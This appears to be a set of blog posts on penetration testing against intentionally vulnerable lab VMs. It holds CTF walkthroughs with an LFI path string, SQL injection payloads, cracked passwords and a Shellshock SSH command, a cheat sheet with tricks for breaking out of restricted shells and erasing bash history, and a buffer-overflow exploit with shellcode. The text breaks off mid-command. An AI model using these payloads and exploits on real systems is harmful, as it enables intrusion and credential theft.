cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


root@SickOs:/root#

Root Flag

Thanks for the VM :)

LAMP Security CTF4 - Walkthrough

Dhruv Ambaliya — Wed, 10 Jan 2024 18:00:10 +0000

Difficulty Rating:

Author Description
Enumeration
SQLMap Enumeration
- SQLMap
- SQLMap Dump Hahes + Crack hashes
SSH Login
Linux Local Privilege Escalation
Post Exploitation Enumeration

Author Description

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available (http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/).

Author: madirish2600

Download: VulnHub

Enumeration

Port Scanning

nmap -v -p 1-65535 -sV -O -sT 192.168.30.147

Dislcaimer: Multiple Entry Points

The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.

Service Enumeration

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 4.3 (protocol 2.0)
`TCP: 25`	SMTP	Sendmail 8.13.5/8.13.5
`TCP: 80`	HTTPD	Apache httpd 2.2.0 ((Fedora))

HTTP Enumeration

Inspection of the Web Application revealed the blog used GET requests.

LFI Exploit

The string index.html?page=../../../../../../etc/passwd%00 exposed the contents on the unix passwd file.

RFI did not appear possible.

SQLMap Enumeration

SQLMap was leveraged to enumerate, and successfully exploit SQLi and dump the MySQL databases on the target.

SQLMap

Using the GET ‘id’ as the injection point, the following SQLMap command was used to successfully list tables for all databases on the target system.

sqlmap -u "http://192.168.30.147/index.html?page=blog&title=Blog&id=2" -p id --tables

Full SQLMap Command Output:

_
___ ___| |_____ ___ ___  {1.0-dev-nongit-0826}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
|_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:05:38

[12:05:38] [INFO] testing connection to the target URL
[12:05:38] [INFO] testing if the target URL is stable
[12:05:39] [INFO] target URL is stable
[12:05:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:05:39] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:05:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:05:57] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[12:05:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:05:57] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:05:57] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:05:57] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:05:57] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:05:57] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:05:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:05:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[12:05:57] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:05:57] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[12:05:57] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[12:05:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:05:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[12:05:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:05:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:05:57] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:05:57] [INFO] testing 'MySQL inline queries'
[12:05:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[12:05:57] [WARNING] time-based comparison requires larger statistical model, please wait....                                                                                         
[12:05:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[12:05:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:05:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:05:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:05:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:05:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[12:06:08] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[12:06:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:06:08] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:06:08] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:06:08] [INFO] target URL appears to have 5 columns in query
[12:06:08] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 7114=7114

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))kOtW)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162707871,0x4f75614351414f4d6e69,0x7176717671),NULL--
---
[12:06:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL 5.0.12
[12:06:31] [INFO] fetching database names
[12:06:31] [INFO] fetching tables for databases: 'calendar, ehks, information_schema, mysql, roundcubemail, test'
Database: calendar
[5 tables]
+---------------------------------------+
| phpc_calendars                        |
| phpc_events                           |
| phpc_sequence                         |
| phpc_users                            |
| uid                                   |
+---------------------------------------+

Database: roundcubemail
[6 tables]
+---------------------------------------+
| session                               |
| cache                                 |
| contacts                              |
| identities                            |
| messages                              |
| users                                 |
+---------------------------------------+

Database: ehks
[3 tables]
+---------------------------------------+
| user                                  |
| blog                                  |
| comment                               |
+---------------------------------------+

Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: mysql
[17 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| func                                  |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| proc                                  |
| procs_priv                            |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+

SQLMap Dump Hahes + Crack hashes

sqlmap -u "http://192.168.30.147/index.html?page=blog&title=Blog&id=2" -p id -D ehks -T user  --dump

_
___ ___| |_____ ___ ___  {1.0-dev-nongit-0826}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
|_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:15:25

[12:15:25] [INFO] resuming back-end DBMS 'mysql'
[12:15:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 7114=7114

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))kOtW)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162707871,0x4f75614351414f4d6e69,0x7176717671),NULL--
---
[12:15:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL 5.0.12
[12:15:25] [INFO] fetching columns for table 'user' in database 'ehks'
[12:15:25] [INFO] fetching entries for table 'user' in database 'ehks'
[12:15:25] [INFO] analyzing table dump for possible password hashes
[12:15:25] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[12:15:34] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[12:15:35] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[12:15:36] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:15:36] [INFO] starting 4 processes
[12:15:37] [INFO] cracked password 'Homesite' for user 'pmoore'                                                                                                                       
[12:15:38] [INFO] cracked password 'Sue1978' for user 'jdurbin'                                                                                                                       
[12:15:39] [INFO] cracked password 'ilike2surf' for user 'dstevens'                                                                                                                   
[12:15:42] [INFO] cracked password 'pacman' for user 'sorzek'                                                                                                                         
[12:15:42] [INFO] cracked password 'undone1' for user 'ghighland'                                                                                                                     
[12:15:43] [INFO] cracked password 'seventysixers' for user 'achen'                                                                                                                   
[12:15:44] [INFO] postprocessing table dump                                                                                                                                           
Database: ehks
Table: user
[6 entries]
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+

[12:15:44] [WARNING] table 'ehks.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.30.147/dump/ehks/user-f3649c95.csv'
[12:15:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.30.147'

All the dumped accounts appeared to have matching SSH accounts sharing the same credentials as the vulnerable web application.

Linux Local Privilege Escalation

The account achen was a memeber of the sudo group.

The command sudo -s was executed, successfully escalating privileges to super user.

[achen@ctf4 ~]$ sudo -s
[root@ctf4 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t:SystemLow-SystemHigh
[root@ctf4 ~]# cat /root/

Post Exploitation Enumeration

There appears to be no root flag, for this capture the flag challenge.

Additionally .bash_history contained the root password:

[achen@ctf4 ~]$ cat .bash_history
exit
clear
exit
sudo sy
su
root1234
su
exit

Thanks for the VM :)

Linux Commands Cheat Sheet

Dhruv Ambaliya — Tue, 02 Jan 2024 08:20:10 +0000

Linux Penetration Testing Commands

A collection of hopefully useful Linux Commands for pen testers, this is not a complete list but a collection of commonly used commands + syntax as a sort of “cheatsheet”, this content will be constantly updated as I discover new awesomeness.

Linux Penetration Testing Commands

The commands listed below are designed for local enumeration, typical commands a penetration tester would use during post exploitation or when performing command injection etc. See our pen test cheat sheet for an in depth list of pen testing tool commands and example usage.

Linux Network Commands

Command	Description
`netstat -tulpn`	Show Linux network ports with process ID's (PIDs)
`watch ss -stplu`	Watch TCP, UDP open ports in real time with socket summary.
`lsof -i`	Show established connections.
`macchanger -m MACADDR INTR`	Change MAC address on KALI Linux.
`ifconfig eth0 192.168.2.1/24`	Set IP address in Linux.
`ifconfig eth0:1 192.168.2.3/24`	Add IP address to existing network interface in Linux.
`ifconfig eth0 hw ether MACADDR`	Change MAC address in Linux using ifconfig.
`ifconfig eth0 mtu 1500`	Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
`dig -x 192.168.1.1`	Dig reverse lookup on an IP address.
`host 192.168.1.1`	Reverse lookup on an IP address, in case dig is not installed.
`dig @192.168.2.2 domain.com -t AXFR`	Perform a DNS zone transfer using dig.
`host -l domain.com nameserver`	Perform a DNS zone transfer using host.
`nbtstat -A x.x.x.x`	Get hostname for IP address.
`ip addr add 192.168.2.22/24 dev eth0`	Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
`tcpkill -9 host google.com`	Blocks access to google.com from the host machine.
`echo "1" > /proc/sys/net/ipv4/ip_forward`	Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
`echo "8.8.8.8" > /etc/resolv.conf`	Use Google DNS.

System Information Commands

Useful for local enumeration.

Command	Description
`whoami`	Shows currently logged in user on Linux.
`id`	Shows currently logged in user and groups for the user.
`last`	Shows last logged in users.
`mount`	Show mounted drives.
`df -h`	Shows disk usage in human readable output.
`echo "user:passwd" \| chpasswd`	Reset password in one line.
`getent passwd`	List users on Linux.
`strings /usr/local/bin/blah`	Shows contents of none text files, e.g. whats in a binary.
`uname -ar`	Shows running kernel version.
`PATH=$PATH:/my/new-path`	Add a new PATH, handy for local FS manipulation.
`history`	Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

Command	Description
`cat /etc/redhat-release`	Shows Redhat / CentOS version number.
`rpm -qa`	List all installed RPM's on an RPM based Linux distro.
`rpm -q --changelog openvpn`	Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems, you can pull some usefull information about installed packages and or install additional tools.

Command	Description
`yum update`	Update all RPM packages with YUM, also shows whats out of date.
`yum update httpd`	Update individual packages, in this example HTTPD (Apache).
`yum install package`	Install a package using YUM.
`yum --exclude=package kernel* update`	Exclude a package from being updates with YUM.
`yum remove package`	Remove package with YUM.
`yum erase package`	Remove package with YUM.
`yum list package`	Lists info about yum package.
`yum provides httpd`	What a packages does, e.g Apache HTTPD Server.
`yum info httpd`	Shows package info, architecture, version etc.
`yum localinstall blah.rpm`	Use YUM to install local RPM, settles deps from repo.
`yum deplist package`	Shows deps for a package.
`yum list installed \| more`	List all installed packages.
`yum grouplist \| more`	Show all YUM groups.
`yum groupinstall 'Development Tools'`	Install YUM group.

Debian / Ubuntu / .deb Based Distros

Command	Description
`cat /etc/debian_version`	Shows Debian version number.
`cat /etc/*-release`	Shows Ubuntu version number.
`dpkg -l`	List all installed packages on Debian / .deb based Linux distro.

Linux User Management

Command	Description
`useradd new-user`	Creates a new Linux user.
`passwd username`	Reset Linux user password, enter just `passwd` if you are root.
`deluser username`	Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 etc) on Linux and some other tricks for searching inside of archives etc.

Command	Description
`unzip archive.zip`	Extracts zip file on Linux.
`zipgrep *.txt archive.zip`	Search inside a .zip archive.
`tar xf archive.tar`	Extract tar file Linux.
`tar xvzf archive.tar.gz`	Extract a tar.gz file Linux.
`tar xjf archive.tar.bz2`	Extract a tar.bz2 file Linux.
`tar ztvf file.tar.gz \| grep blah`	Search inside a tar.gz file.
`gzip -d archive.gz`	Extract a gzip file Linux.
`zcat archive.gz`	Read a gz file Linux without decompressing.
`zless archive.gz`	Same function as the `less` command for .gz archives.
`zgrep 'blah' /var/log/maillog*.gz`	Search inside .gz archives on Linux, search inside of compressed log files.
`vim file.txt.gz`	Use vim to read .txt.gz files (my personal favorite).
`upx -9 -o output.exe input.exe`	UPX compress .exe file Linux.

Linux Compression Commands

Command	Description
`zip -r file.zip /dir/*`	Creates a .zip file on Linux.
`tar cf archive.tar files`	Creates a tar file on Linux.
`tar czf archive.tar.gz files`	Creates a tar.gz file on Linux.
`tar cjf archive.tar.bz2 files`	Creates a tar.bz2 file on Linux.
`gzip file`	Creates a file.gz file on Linux.

Linux File Commands

Command	Description
`df -h blah`	Display size of file / dir Linux.
`diff file1 file2`	Compare / Show differences between two files on Linux.
`md5sum file`	Generate MD5SUM Linux.
`md5sum -c blah.iso.md5`	Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
`file blah`	Find out the type of file on Linux, also displays if file is 32 or 64 bit.
`dos2unix`	Convert Windows line endings to Unix / Linux.
`base64 < input-file > output-file`	Base64 encodes input file and outputs a Base64 encoded file called output-file.
`base64 -d < input-file > output-file`	Base64 decodes input file and outputs a Base64 decoded file called output-file.
`touch -r ref-file new-file`	Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
`rm -rf`	Remove files and directories without prompting for confirmation.

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //server/share /mnt/win -o user=username,password=password1
$ smbclient -U user \\\\server\\share
$ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

/bin/sh -i

Misc Commands

Command	Description
`init 6`	Reboot Linux from the command line.
`gcc -o output.c input.c`	Compile C code.
`gcc -m32 -o output.c input.c`	Cross compile C code, compile 32 bit binary on 64 bit Linux.
`unset HISTORYFILE`	Disable bash history logging.
`rdesktop X.X.X.X`	Connect to RDP server from Linux.
`kill -9 $$`	Kill current session.
`chown user:group blah`	Change owner of file or dir.
`chown -R user:group blah`	Change owner of file or dir and all underlying files / dirs - recersive chown.
`chmod 600 file`	Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details.

Clear bash history:

      $ ssh user@X.X.X.X | cat /dev/null > ~/.bash_history

Linux File System Permissions

Value	Meaning
`777`	`rwxrwxrwx` No restriction, global WRX any user can do anything.
`755`	`rwxr-xr-x` Owner has full access, others can read and execute the file.
`700`	`rwx------` Owner has full access, no one else has access.
`666`	`rw-rw-rw-` All users can read and write but not execute.
`644`	`rw-r--r--` Owner can read and write, everyone else can read.
`600`	`rw-------` Owner can read and write, everyone else has no access.

Linux File System

Directory	Description
`/`	/ also know as "slash" or the root.
`/bin`	Common programs, shared by the system, the system administrator and the users.
`/boot`	Boot files, boot loader (grub), kernels, vmlinuz
`/dev`	Contains references to system devices, files with special properties.
`/etc`	Important system config files.
`/home`	Home directories for system users.
`/lib`	Library files, includes files for all kinds of programs needed by the system and the users.
`/lost+found`	Files that were saved during failures are here.
`/mnt`	Standard mount point for external file systems.
`/media`	Mount point for external file systems (on some distros).
`/net`	Standard mount point for entire remote file systems - nfs.
`/opt`	Typically contains extra and third party software.
`/proc`	A virtual file system containing information about system resources.
`/root`	root users home dir.
`/sbin`	Programs for use by the system and the system administrator.
`/tmp`	Temporary space for use by the system, cleaned upon reboot.
`/usr`	Programs, libraries, documentation etc. for all user-related programs.
`/var`	Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to privilege escalate / perform post exploitation.

Directory	Description
`/etc/passwd`	Contains local Linux users.
`/etc/shadow`	Contains local account password hashes.
`/etc/group`	Contains local account groups.
`/etc/init.d/`	Contains service init script - worth a look to see whats installed.
`/etc/hostname`	System hostname.
`/etc/network/interfaces`	Network interfaces.
`/etc/resolv.conf`	System DNS servers.
`/etc/profile`	System environment variables.
`~/.ssh/`	SSH keys.
`~/.bash_history`	Users bash history log.
`/var/log/`	Linux system log files are typically stored here.
`/var/adm/`	UNIX system log files are typically stored here.
`/var/log/apache2/access.log` `/var/log/httpd/access.log`	Apache access log file typical path.
`/etc/fstab`	File system mounts.

Tr0ll 2 Walkthrough

Dhruv Ambaliya — Tue, 02 Jan 2024 00:12:52 +0000

Coffee Difficulty Rating:

Description
SSH Shellshock

I rooted Tr0ll 1, so thought it would be rude not to try the second VM in the Tr0ll series… Tr0ll 2 requires a buffer overflow to perform local escalation, the first VM didn’t require any exploitation. However, like the first VM I’d say this is challenege is more a case of guessing credentials, trying things you think probably wont work.

Description

The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)

Difficulty is beginner++ to intermediate.

##Enumeration

Enumeration process started.

nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6

root:~# nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-02 19:24 EST

Host is up (0.0026s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.8
Network Distance: 2 hops
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds

###Service Enumeration

Port	Service	Version Detection
`TCP: 21`	FTP	vsftpd 2.0.8 or later
`TCP: 22`	SSH	OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
`TCP: 80`	HTTP	Apache httpd 2.2.22 ((Ubuntu))

###SSH Enumeration

Zoning out watching my Nmap scan complete I noticed, the hostname was Tr0ll. I attempted to login via ssh with Tr0ll password: Tr0ll, it worked ! But I instantly got booted off, tried a few things nothing worked… So I tried FTP.

###FTP Enumeration

I tired the same credentials against ftp and discovered a file called “noob” in the ftp root.

ftp noob

root:~# ftp 172.31.31.6

Connected to 172.31.31.6
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (172.31.31.6:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get lmao.zip
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1474 bytes received in 0.02 secs (60.6 kB/s)
ftp> exit
221 Goodbye.

Attempting to extract lmao.zip failed, prompting for a noob password.

Onto the next service then…

###HTTP Enumeration

Web browser showed:

nmap --script=http-enum -p80 -n 172.31.31.6

root:~# nmap --script=http-enum -p80 -n 172.31.31.6

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-2 18:40 GMT
Nmap scan report for 172.31.31.6
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds

Entering /robots.txt url in the browser rendered:

User-agent:*
Disallow:
/noob
/nope
/try_harder
/keep_trying
/isnt_this_annoying
/nothing_here
/404
/LOL_at_the_last_one
/trolling_is_fun
/zomg_is_this_it
/you_found_me
/I_know_this_sucks
/You_could_give_up
/dont_bother
/will_it_ever_end
/I_hope_you_scripted_this
/ok_this_is_it
/stop_whining
/why_are_you_still_looking
/just_quit
/seriously_stop

The slash was stripped off with some sed sed 's./..g' robots.txt dirb was then used to check the following urls.

-----------------
DIRB v2.21    
By The Dark Raver
-----------------

START_TIME: Sat Jan  3 08:08:15 2015
URL_BASE: http://172.31.31.6/
WORDLIST_FILES: robots.txt

-----------------

GENERATED WORDS: 21                                                            

---- Scanning URL: http://172.31.31.6/ ----
+ http://172.31.31.6//noob (CODE:301|SIZE:309)                                                                               
+ http://172.31.31.6//keep_trying (CODE:301|SIZE:316)                                                                        
+ http://172.31.31.6//dont_bother (CODE:301|SIZE:316)                                                                        
+ http://172.31.31.6//ok_this_is_it (CODE:301|SIZE:318)                                                                      

-----------------
DOWNLOADED: 21 - FOUND: 4

They all rendered the same image (301’d).

Nothing exciting was in the page source:

What did you really think to find here? Try Harder

cat_the_troll.jpg was downloaded from all the above locations from the target and examined.

ls -la showed a slightly different file size for one of the images, I began by running each of the files through cat (cating the cat? - sorry).

Look Deep within y0ur_self for the answer

I tired this against the previously downloaded lmao.zip file, no luck. I tried y0ur_self as web path like on tr0ll:1

Success, the web dir contained a text file http://172.31.31.6/y0ur_self/answer.txt scrolling though from the browser it looked like the file was base64 encoded.

wget http://172.31.31.6/y0ur_self/answer.txt

root:~# wget http://172.31.31.6/y0ur_self/answer.txt

Decoding the file revealed it was massive, the following was used to decode and sort by line length:

base64 decoding

root:~# base64 -d answer.txt > answer-decoded.txt && awk '{print length, $0;}' answer-decoded.txt | sort -nr | less

30 ItCantReallyBeThisEasyRightLOL

The top line looked promising, ItCantReallyBeThisEasyRightLOL I tried this against lmao.zip

unzip lmao.zip

root:~# unzip lmao.zip

Archive: lmao.zip
[lmao.zip] noob password:
inflating: noob

Yes!

The contents of noob

SSH Shellshock

Attempting to login using the discovered key failed, with a messaging saying TRY HARDER LOL!.

I tried to feed it commands by tagging them on the end, the connection hung then dropped with no message.

I googled some shellshock options and managed to spawn a shell with:

ssh -i noob noob@192.168.145.129 '() { :;}; /bin/bash'

shellshock ssh

root:~# ssh -i noob noob@192.168.145.129 '() { :;}; /bin/bash'

id
uid=1002(noob) gid=1002(noob) groups=1002(noob)

##Local Enumeration

Transfered my local enumeration script to the target, disclosing the following odd sticky bit files:

#########################################
## Sticky Bit                          ##
#########################################

drwsr-xr-x 3 root root 4096 Dec 29 19:00 /nothing_to_see_here
drwsr-xr-x 5 root root 4096 Oct  4 22:36 /nothing_to_see_here/choose_wisely
drwsr-xr-x 2 root root 4096 Oct  5 21:19 /nothing_to_see_here/choose_wisely/door2
drwsr-xr-x 2 root root 4096 Oct  5 21:18 /nothing_to_see_here/choose_wisely/door3
drwsr-xr-x 2 root root 4096 Oct  4 22:19 /nothing_to_see_here/choose_wisely/door1

Each of the door directories contained a file called r00t, du -sh * in the parent dir choose_wisely showed one of the files was larger - I started there.

od -S 1 r00t was used against each of the files, the larget file contained:

0017545 bof.c
0017553 __init_array_end
0017574 _DYNAMIC
0017605 __init_array_start
0017630 _GLOBAL_OFFSET_TABLE_
0017656 __libc_csu_fini
0017676 __i686.get_pc_thunk.bx
0017725 data_start
0017740 printf@@GLIBC_2.0
0017762 _edata
0017771 _fini
0017777 strcpy@@GLIBC_2.0
0020021 __DTOR_END__
0020036 __data_start
0020053 __gmon_start__
0020072 exit@@GLIBC_2.0
0020112 __dso_handle
0020127 _IO_stdin_used
0020146 __libc_start_main@@GLIBC_2.0
0020203 __libc_csu_init

bof.c - pretty good indication that Buffer Overflow was the next logical step (unless it’s more tr0ling).

##Exploit Development

###Fuzzing

I started by fuzzing with 300 A’s:

fuzzing linux binary

root:~# ./r00t $(python -c 'print "A" *300')

Segmentation fault

Bangin’ then I tried 250 no crash, adding 10 each time then subtracting when the seg fault occoured at 268 and the instruction pointer address at 269 Illegal instruction.

Using gdb I located the address of ESP.

(gdb) i r esp
esp            0xbffffb80 0xbffffb80

Padded with some NOPs - for a reliable landing.

Overwrote EIP with the location of ESP and tagged some shellcode on the end to exectute a shell.

###Final Exploit

./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

Note: gdb drops privileges on SUID, in order to spawn the new shell with SUID you need to execute the exploit outside of gdb, or the shell will spawn as the unprivileged user.

The binaries in choose_wisely/door* are rotated, the largest is the vulnerable binary.

Exploit Process

          root:~#
          du -sh *

          12K door1

          12K door2

          16K door3

          root:~#
          cd door3

          root:~#
          ./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 
